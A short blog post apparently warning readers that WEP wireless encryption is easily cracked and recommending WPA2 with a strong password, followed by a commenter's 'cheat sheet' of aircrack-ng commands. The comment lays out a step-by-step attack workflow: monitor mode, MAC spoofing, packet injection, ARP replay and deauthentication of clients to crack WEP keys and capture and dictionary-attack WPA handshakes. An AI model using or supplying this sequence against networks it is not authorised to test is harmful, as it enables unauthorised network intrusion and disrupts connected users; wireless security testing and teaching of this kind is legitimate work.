Stumbling across the internet I found a website that details step by step guide to hacking WEP encrypted wireless. Being as how simple it is, it is a great example why you should move away from WEP and go with WPA2.
As with any hack that I mention I give you a way to protect yourself from such attack. So make sure you upgrade your router to one that supports WPA2 and create a long password that uses a combination of letters and numbers including special characters and capitals.

Great post. Here is my personal cheat sheet for wireless:
WEP Crack
- Find your interface
iwconfig
- Test to see if injection works on your card
aireplay-ng -9
- Make sure interface is disabled so we have a fresh start
airmon-ng stop
ifconfig down
- Find a target
airodump-ng
- Set your mac address
macchanger –mac 00:11:22:33:44:55
- Start your interface in monitor mode
airmon-ng start
- Start dumping captured packets into a file
airodump-ng -c -w –bssid
- Associate with the access point
aireplay-ng -1 6000 –o 1 –q 10 -a -h 00:11:22:33:44:55 -e
- Capture an ARP packet and replay it to the interface to generate IVS
aireplay-ng -3 -b -h 00:11:22:33:44:55
- Send Disassoc/Deauth packet to a client to generate some traffic so we can get an ARP packet
aireplay-ng -0 1 -a -c
- Once we have 10,000 IVs captured (20,000 for 128bit WEP) we can crack the password
aircrack-ng -b (bssid) (file name-01.cap)
WPA Crack
- Take interface down so we have a fresh start
airmon-ng stop
ifconfig down
- Find a target
airodump-ng
- Start interface in monitor mode
airmon-ng start
- Dump captured packets to a file
airodump-ng -c –bssid -w psk
- Start up wireshark and set the filter to ‘eapol’ to see when the 4-way handshake happens
- Send Disassoc/Deauth packet to a client so we can capture a WPA Handshake
aireplay-ng -0 1 -a -c
- Once we have the handshake we can run aircrack on the captured data.
aircrack-ng -w password.lst -b psk*.cap
